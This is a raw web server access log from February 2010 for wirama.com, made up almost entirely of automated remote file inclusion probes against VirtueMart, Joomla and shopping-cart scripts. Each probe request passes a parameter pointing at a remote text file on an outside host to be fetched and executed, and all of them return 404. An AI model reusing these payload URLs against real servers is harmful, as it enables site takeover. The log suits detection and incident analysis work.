203.251.80.167 - - [01/Feb/2010:02:17:07 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.wirama.com"
203.251.80.167 - - [01/Feb/2010:02:17:07 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.wirama.com"
85.17.203.198 - - [01/Feb/2010:02:17:15 -0800] "GET /logs/index.php?INCLUDE_FOLDER=http://b2751661.justfree.com/lo.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.wirama.com"
85.17.203.198 - - [01/Feb/2010:02:17:15 -0800] "GET /index.php?INCLUDE_FOLDER=http://b2751661.justfree.com/lo.txt? HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.wirama.com"
203.251.80.167 - - [01/Feb/2010:02:17:20 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.wirama.com"
203.251.80.167 - - [01/Feb/2010:02:17:20 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:02:17:29 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.yeonri.com/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:02:17:29 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.yeonri.com/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:02:17:29 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.yeonri.com/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:02:17:35 -0800] "GET /logs//administrator/components/com_virtuemart/notify.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:02:17:35 -0800] "GET /administrator/components/com_virtuemart/notify.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:02:17:35 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/notify.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:02:17:46 -0800] "GET /logs//administrator/components/com_virtuemart/notify.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:02:17:46 -0800] "GET /administrator/components/com_virtuemart/notify.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:02:17:46 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/notify.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:02:18:11 -0800] "GET /logs/access_100101.log//administrator/components/com_virtuemart/notify.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:02:18:28 -0800] "GET /logs/access_100101.log//administrator/components/com_virtuemart/notify.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.19.177.19 - - [01/Feb/2010:02:18:35 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
193.19.177.19 - - [01/Feb/2010:02:18:35 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
213.251.189.204 - - [01/Feb/2010:02:19:18 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
213.251.189.204 - - [01/Feb/2010:02:19:18 -0800] "GET /logs/access_090801.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
213.251.189.204 - - [01/Feb/2010:02:19:18 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:23:35 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:23:35 -0800] "GET /logs/access_090801.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:23:35 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:24:15 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:24:15 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:24:15 -0800] "GET /logs/access_090801.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:24:19 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:24:19 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:24:19 -0800] "GET /logs/access_090801.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:24:33 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:24:33 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:24:33 -0800] "GET /logs/access_090801.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:29:40 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:29:40 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:29:40 -0800] "GET /logs/access_090801.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:29:44 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:29:44 -0800] "GET /logs/access_090801.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:29:44 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:29:49 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:29:49 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:29:49 -0800] "GET /logs/access_090801.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:02:29:56 -0800] "GET /logs/access_090329.log%20%20////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:02:29:57 -0800] "GET ///twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:02:29:57 -0800] "GET /logs////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:02:30:13 -0800] "GET ///twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.115.131.17 - - [01/Feb/2010:02:30:16 -0800] "GET ///twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.115.131.17 - - [01/Feb/2010:02:30:16 -0800] "GET /logs////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:02:30:16 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:30:16 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:30:16 -0800] "GET /logs/access_090801.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:02:30:26 -0800] "GET ///twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:02:30:31 -0800] "GET /logs/access_090329.log%20%20////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:02:30:31 -0800] "GET ///twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:02:30:31 -0800] "GET /logs////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:02:30:34 -0800] "GET /logs////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.115.131.17 - - [01/Feb/2010:02:30:34 -0800] "GET ///twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.115.131.17 - - [01/Feb/2010:02:30:34 -0800] "GET /logs/access_091101.log////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.115.131.17 - - [01/Feb/2010:02:30:40 -0800] "GET /logs/access_091101.log////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.115.131.17 - - [01/Feb/2010:02:30:40 -0800] "GET /logs////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.115.131.17 - - [01/Feb/2010:02:30:40 -0800] "GET /logs/access_091201.log////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.115.131.17 - - [01/Feb/2010:02:30:41 -0800] "GET /logs/access_091101.log////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.115.131.17 - - [01/Feb/2010:02:30:42 -0800] "GET /logs////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
87.250.255.243 - - [01/Feb/2010:02:30:45 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:02:30:46 -0800] "GET ///twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.115.131.17 - - [01/Feb/2010:02:30:46 -0800] "GET /logs////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.115.131.17 - - [01/Feb/2010:02:30:46 -0800] "GET /logs/access_091101.log////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.251.80.167 - - [01/Feb/2010:02:31:27 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.wirama.com"
203.251.80.167 - - [01/Feb/2010:02:31:27 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.wirama.com"
193.28.184.15 - - [01/Feb/2010:02:32:22 -0800] "GET /administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.28.184.15 - - [01/Feb/2010:02:32:23 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.28.184.15 - - [01/Feb/2010:02:32:23 -0800] "GET /logs//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.28.184.15 - - [01/Feb/2010:02:32:47 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.28.184.15 - - [01/Feb/2010:02:32:47 -0800] "GET /administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.28.184.15 - - [01/Feb/2010:02:32:47 -0800] "GET /logs//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.115.131.17 - - [01/Feb/2010:02:33:51 -0800] "GET /logs/access_091101.log%20%20////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.115.131.17 - - [01/Feb/2010:02:34:01 -0800] "GET /logs/access_091101.log%20%20////twindow_cart.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
213.251.189.204 - - [01/Feb/2010:02:36:33 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
213.251.189.204 - - [01/Feb/2010:02:36:33 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
213.251.189.204 - - [01/Feb/2010:02:36:33 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
213.251.189.204 - - [01/Feb/2010:02:36:33 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
213.251.189.204 - - [01/Feb/2010:02:36:33 -0800] "GET /logs/access_090801.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
213.251.189.204 - - [01/Feb/2010:02:36:33 -0800] "GET /logs/access_090801.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:38:21 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:38:21 -0800] "GET /logs/access_090801.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:38:21 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:38:26 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:38:26 -0800] "GET /logs/access_090801.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:38:26 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:38:28 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:38:28 -0800] "GET /logs/access_090801.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:38:28 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.28.184.15 - - [01/Feb/2010:02:38:35 -0800] "GET /administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.28.184.15 - - [01/Feb/2010:02:38:35 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.28.184.15 - - [01/Feb/2010:02:38:35 -0800] "GET /logs//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:02:38:37 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:38:37 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:38:37 -0800] "GET /logs/access_090801.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.28.184.15 - - [01/Feb/2010:02:39:14 -0800] "GET /administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.28.184.15 - - [01/Feb/2010:02:39:14 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.28.184.15 - - [01/Feb/2010:02:39:14 -0800] "GET /logs//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.251.80.167 - - [01/Feb/2010:02:42:39 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.wirama.com"
203.251.80.167 - - [01/Feb/2010:02:42:39 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.wirama.com"
